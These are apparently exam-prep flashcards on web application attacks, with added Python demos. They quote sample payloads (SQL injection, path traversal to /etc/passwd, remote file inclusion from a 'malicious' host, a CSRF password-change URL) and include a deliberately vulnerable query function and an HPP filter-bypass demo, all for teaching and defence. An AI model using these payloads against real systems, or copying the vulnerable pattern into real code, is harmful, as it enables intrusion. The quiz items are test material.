Ch 6- Test
D. SQL Injection
Consider the following string: Ben' or '1'='1 The string is an example of what type of attack? A. XSS B. XSRF C. CSRF D. SQL Injection
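The reason the string above is a SQL injection is easiest to see by running it. The following example is added here and is not part of the original deck; it builds a throwaway SQLite table of constructed users (the names and passwords are made up) and compares a query that splices the input into the SQL text against one that binds it as a parameter.

```python
import sqlite3

# Constructed sample data for the demo (not from the original page).
USERS = [("ben", "s3cret"), ("alice", "hunter2"), ("chris", "passw0rd")]

# The exact string from the flashcard.
PAYLOAD = "Ben' or '1'='1"


def make_db():
    """Create an in-memory database holding the sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def lookup_vulnerable(conn, name):
    """Deliberately vulnerable: the input is concatenated into the SQL text.

    With PAYLOAD the statement becomes
        SELECT name FROM users WHERE name = 'Ben' or '1'='1'
    The first quote in the input closes the literal and the rest is parsed
    as SQL; '1'='1' is always true, so every row comes back.
    """
    sql = "SELECT name FROM users WHERE name = '" + name + "'"
    return sorted(row[0] for row in conn.execute(sql))


def lookup_safe(conn, name):
    """Hardened: a bound parameter is always data, never SQL syntax."""
    sql = "SELECT name FROM users WHERE name = ?"
    return sorted(row[0] for row in conn.execute(sql, (name,)))


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", lookup_vulnerable(db, PAYLOAD))  # all three users
    print("safe:      ", lookup_safe(db, PAYLOAD))        # [] (no such user)
    print("safe:      ", lookup_safe(db, "ben"))          # ['ben']
```

The same payload that returns the whole table through string concatenation matches nothing through the parameterised query, because the driver never lets the quote characters reach the SQL parser as syntax.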
B. XSS attacks
Software developers should escape all characters (including spaces but excluding alphanumeric characters) with the HTML entity &#xHH; format to prevent what type of attack? A. Brute-force attacks B. XSS attacks C. CSRF attacks D. DDoS attacks
C. Directory (path) traversal
What type of attack is shown in the following URL? http://portal.h4cker.org/%2e%2e%5c%2e%2e%2f%2e%2e%5c%2e%2e%5c/omar_file.txt A. Cookie brute-force attack B. URL encoding for SQL injection C. Directory (path) traversal D. Session manipulation
D. All of these
Which of the following are examples of code injection vulnerabilities? A. Object injections B. HTML script injections C. SQL injections D. All of these
B. Reflected XSS attacks are not persistent.
Which of the following is true about reflected XSS? A. Reflected XSS attacks are persistent. B. Reflected XSS attacks are not persistent. C. Reflected XSS attacks can be found by fuzzing a database. D. In reflected XSS, the payload is never sent to the server; this is similar to a blind SQL injection.
D. CSRF
Which of the following occurs when a user who is authenticated by an application through a cookie saved in the browser unwittingly sends an HTTP request to a site that trusts the user, subsequently triggering an unwanted action? A. Fuzzing B. Reflected XSS C. Session fixation D. CSRF
A. Read and (in some cases) execute files on the victim's system
Local file inclusion (LFI) vulnerabilities occur when a web application allows a user to submit input into files or upload files to the server. Successful exploitation could allow an attacker to perform which of the following operations? A. Read and (in some cases) execute files on the victim's system B. Inject shell code on an embedded system C. Invoke PowerShell scripts to perform lateral movement D. Execute code hosted in a system controlled by the attacker
B. Fingerprint web application development frameworks
PHPSESSID and JSESSIONID can be used to do what? A. Fingerprinting an OS B. Fingerprint web application development frameworks C. Fingerprint open ports in applications D. Fingerprint usernames and passwords
C. Insecure hidden form elements
What type of security malpractice is shown in the following example? <input type="hidden" id="123" name="price" value="100.00"> A. Weak form values B. Invalid HTML signing C. Insecure hidden form elements D. Weak ID
C. Insecure Direct Object Reference
What type of vulnerabilities can be triggered by using the parameters in the following URL? http://web.h4cker.org/changepassd?user=chris A. XSS B. SQL injection C. Insecure Direct Object Reference D. Indirect Object Reference
C. HTTP parameter pollution (HPP)
What type of vulnerabilities can be triggered by using the parameters in the following URL? https://store.h4cker.org/?search=cars&results=20&search=bikes A. XSS B. SQL injection C. HTTP parameter pollution (HPP) D. Command injection
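HTTP parameter pollution works because different components pick different occurrences of a repeated parameter. The following is an added example, not code from the original deck: it parses the URL from the question and shows the three common server-side interpretations (first occurrence, last occurrence, and the comma-joined form), then a constructed two-stage filter/back-end split in which the two stages disagree. The blocklist and the split are assumptions for the demo.

```python
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# URL from the flashcard.
URL = "https://store.h4cker.org/?search=cars&results=20&search=bikes"


def query_pairs(url):
    """Return the query string as an ordered list of (name, value) pairs."""
    return parse_qsl(urlsplit(url).query, keep_blank_values=True)


def first_value(pairs, name):
    """Take the first occurrence (what a Java servlet's getParameter returns)."""
    return next((v for n, v in pairs if n == name), None)


def last_value(pairs, name):
    """Take the last occurrence (what PHP's $_GET gives you)."""
    return next((v for n, v in reversed(pairs) if n == name), None)


def joined_value(pairs, name):
    """Join all occurrences with commas (what ASP.NET's Request.QueryString returns)."""
    values = [v for n, v in pairs if n == name]
    return ",".join(values) if values else None


def duplicated_names(pairs):
    """Parameter names that appear more than once: the HPP candidates."""
    counts = Counter(n for n, _ in pairs)
    return sorted(n for n, c in counts.items() if c > 1)


def filtered_search(url, blocked):
    """Constructed example of an HPP bypass.

    A front-end filter inspects the first 'search' value; the application
    behind it acts on the last one. Polluting the parameter lets a blocked
    term through because each stage sees a different value.
    """
    pairs = query_pairs(url)
    if first_value(pairs, "search") in blocked:
        return "blocked"
    return "searching " + last_value(pairs, "search")


if __name__ == "__main__":
    pairs = query_pairs(URL)
    print("first :", first_value(pairs, "search"))    # cars
    print("last  :", last_value(pairs, "search"))     # bikes
    print("joined:", joined_value(pairs, "search"))   # cars,bikes
    print("dupes :", duplicated_names(pairs))         # ['search']
    print(filtered_search(URL, blocked={"bikes"}))    # searching bikes
```

When testing, the useful signal is which interpretation a target uses: send a duplicated parameter with distinguishable values and see which one is reflected or acted on.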
A. Remote file inclusion
What type of vulnerability or attack is demonstrated in the following URL? http://web.h4cker.org/?page=http://malicious.h4cker.org/malways.js A. Remote file inclusion B. Local file inclusion C. Reflected XSS D. SQL injection
D. Directory (path) traversal
What type of vulnerability or attack is demonstrated in the following URL? https://store.h4cker.org/buyme/?page=../../../../../etc/passwd A. SQL injection B. DOM-based XSS C. Stored XSS D. Directory (path) traversal
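Both traversal payloads on this page (the percent-encoded `..\..` sequence aimed at omar_file.txt earlier in the deck, and the plain `../../../../../etc/passwd` above) fall to the same defence: decode, normalise, then confirm the result is still inside the directory you intended to serve from. The following is an added example, not code from the original deck; the document root `/var/www/html` is an assumption for the demo.

```python
import posixpath
from urllib.parse import unquote

# Assumed document root for the demo.
ROOT = "/var/www/html"

# The two payloads from the flashcards (the first is the URL path of the
# earlier question, without its leading slash).
ENCODED_PAYLOAD = "%2e%2e%5c%2e%2e%2f%2e%2e%5c%2e%2e%5c/omar_file.txt"
PLAIN_PAYLOAD = "../../../../../etc/passwd"


def fully_decode(value, max_rounds=3):
    """URL-decode until the string stops changing, so %252e (double-encoded
    '.') is unwrapped as well. The round limit keeps pathological input cheap."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_traversal(user_path):
    """Quick detector: does any path segment equal '..' after decoding?

    Backslashes are folded into slashes first because Windows-hosted
    applications treat both as separators, which is exactly what the
    %5c-encoded payload relies on.
    """
    decoded = fully_decode(user_path).replace("\\", "/")
    return ".." in decoded.split("/")


def resolve_under_root(root, user_path):
    """Return the absolute path the request targets, or None if it escapes root.

    This is the check a file-serving handler should make: normalise the
    joined path and require that it still has root as a prefix.
    """
    root = posixpath.normpath(root)
    decoded = fully_decode(user_path).replace("\\", "/").lstrip("/")
    candidate = posixpath.normpath(posixpath.join(root, decoded))
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None


if __name__ == "__main__":
    print(fully_decode(ENCODED_PAYLOAD))            # ..\../..\..\/omar_file.txt
    print(is_traversal(ENCODED_PAYLOAD))            # True
    print(resolve_under_root(ROOT, PLAIN_PAYLOAD))  # None (would be /etc/passwd)
    print(resolve_under_root(ROOT, "images/logo.png"))  # /var/www/html/images/logo.png
```

The segment test is what a WAF or log search can apply cheaply; the prefix test after normalisation is the one that actually decides whether a file is served, and it is the one to rely on.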
C. MD5 D. RC4 E. DES
Which of the following cryptographic algorithms should be avoided? (CATA) A. SHA-256 B. AES C. MD5 D. RC4 E. DES
D. Fuzzing
Which of the following is a black-box testing technique that consists of sending malformed/semi-malformed data injection in an automated fashion? A. Brute forcing B. Bursting C. Man-in-the-middle D. Fuzzing
C. MD5
Which of the following is a hashing algorithm that should be avoided? A. DES B. RSA-1024 C. MD5 D. RC4
B. Using the X-Frame-Options header or the CSP frame-ancestors directive that supersedes it
Which of the following is a mitigation technique for preventing clickjacking attacks? A. Converting &lt; to < B. Using the X-Frame-Options header or the CSP frame-ancestors directive that supersedes it C. Converting &quot; to " D. Converting &#x27; to '
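Whether a page can be framed is decided by two response headers, and when both are present browsers honour the CSP `frame-ancestors` directive and ignore `X-Frame-Options`. The following checker is an added example, not code from the original deck; the sample header sets are constructed to cover the cases a tester runs into.

```python
def framing_protection(headers):
    """Classify a response's headers as protecting against framing or not.

    Returns (protected, reason). CSP frame-ancestors is evaluated first
    because a browser that sees it ignores X-Frame-Options entirely.
    """
    h = {k.lower(): v for k, v in headers.items()}

    csp = h.get("content-security-policy", "")
    for directive in csp.split(";"):
        name, _, value = directive.strip().partition(" ")
        if name.lower() != "frame-ancestors":
            continue
        sources = [s.strip("'").lower() for s in value.split()]
        # No sources, a bare '*', or a scheme-only source such as 'https:'
        # means any origin may frame the page.
        if not sources or any(s == "*" or s.endswith(":") for s in sources):
            return False, "csp frame-ancestors allows any origin: " + value.strip()
        return True, "csp frame-ancestors " + value.strip()

    xfo = h.get("x-frame-options", "").strip().upper()
    if xfo in ("DENY", "SAMEORIGIN"):
        return True, "x-frame-options " + xfo
    if xfo.startswith("ALLOW-FROM"):
        # Obsolete value: current browsers ignore it, so it protects nothing.
        return False, "x-frame-options ALLOW-FROM is obsolete and ignored"
    return False, "no framing restriction"


# Constructed header sets for the demo.
SAMPLES = {
    "deny": {"X-Frame-Options": "DENY"},
    "csp_none": {"Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'"},
    "csp_star_with_xfo": {"Content-Security-Policy": "frame-ancestors *",
                          "X-Frame-Options": "DENY"},
    "allow_from": {"X-Frame-Options": "ALLOW-FROM https://partner.example"},
    "nothing": {"Content-Type": "text/html"},
}


def audit(samples):
    """Run the checker over each sample and return name -> protected flag."""
    return {name: framing_protection(hdrs)[0] for name, hdrs in samples.items()}


if __name__ == "__main__":
    for name, hdrs in SAMPLES.items():
        print(f"{name:18} {framing_protection(hdrs)}")
```

The third sample is the trap: `X-Frame-Options: DENY` looks protective in isolation, but the accompanying `frame-ancestors *` is what the browser applies, so the page is frameable.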
C. Swagger
Which of the following is a modern framework of API documentation and development and the basis of the Open API Specification (OAS), which can be very useful for pen testers to get insights into an API? A. SOAP B. WSDL C. Swagger D. GraphQL
C. Race condition
Which of the following is a type of attack that takes place when a system or an application attempts to perform two or more operations at the same time? A. Clickjacking B. Session hijacking C. Race condition D. Reflected XSS
B. Cyber range
Which of the following is not an example of a vulnerable application that you can use to practice your penetration testing skills? A. Hackazon B. Cyber range C. DVWA D. WebGoat
A. REST
Which of the following is not an example of an HTTP method? A. REST B. PUT C. DELETE D. TRACE
B. CSRF attacks typically affect applications (or websites) that rely on digital certificates that have expired or been forged.
Which of the following is not true about CSRF or XSRF attacks? A. An example of a CSRF attack is a user who is authenticated by the application through a cookie saved in the browser unwittingly sending an HTTP request to a site that trusts the user, subsequently triggering an unwanted action. B. CSRF attacks typically affect applications (or websites) that rely on digital certificates that have expired or been forged. C. CSRF vulnerabilities are also referred to as one-click attacks or session riding. D. CSRF attacks can occur when unauthorized commands are transmitted from a user who is trusted by the application.
D. The session ID (or token) is temporarily equivalent to the strongest authentication method used by the application prior to authentication.
Which of the following is not true? A. The session ID is a name/value pair. B. None of these. C. Once an authenticated session has been established, the session ID (or token) is temporarily equivalent to the strongest authentication method used by the application, such as usernames and passwords, one-time passwords, and client-based digital certificates. D. The session ID (or token) is temporarily equivalent to the strongest authentication method used by the application prior to authentication.
A. In DOM-based XSS, the payload is never sent to the server. Instead, the payload is only processed by the web client (browser).
Which of the following is true about DOM-based XSS? A. In DOM-based XSS, the payload is never sent to the server. Instead, the payload is only processed by the web client (browser). B. None of these. C. In DOM-based XSS, the payload is never sent to the client. Instead, the payload is only processed by the web server. D. In DOM-based XSS, the payload can be sent to the server or the client.
A. All of these
Which of the following is true about clickjacking? A. All of these B. It is possible to launch a clickjacking attack by using a combination of CSS stylesheets, iframes, and text boxes to fool the user into entering information or clicking on links in an invisible frame that could be rendered from a site an attacker created. C. Clickjacking attacks are often referred to as "UI redress attacks." User keystrokes can also be hijacked using clickjacking techniques. D. Clickjacking involves using multiple transparent or opaque layers to induce a user to click on a web button or link on a page that he or she did not intend to navigate to or click.
D. A best practice to avoid cookie manipulation attacks is to dynamically write to cookies using data originating from untrusted sources.
Which of the following statements is not true? A. Cookie manipulation is possible when vulnerable applications store user input and then embed that input into a response within a part of the DOM. B. An attacker can take advantage of stored DOM-based vulnerabilities to create a URL to set an arbitrary value in a user's cookie. C. The impact of a stored DOM-based vulnerability depends on the role that the cookie plays within the application. D. A best practice to avoid cookie manipulation attacks is to dynamically write to cookies using data originating from untrusted sources.
C. CSRF or XSRF
Which of the following vulnerabilities can be exploited with the parameters used in the following URL? http://h4cker.org/resource/?password_new=newpasswd&password_conf=newpasswd&Change=Change# A. SQL injection B. Session manipulation C. CSRF or XSRF D. Reflected XSS
A. All of these
You can find XSS vulnerabilities in which of the following? A. All of these B. Search fields that echo a search string back to the user C. HTTP headers D. Input fields that echo user data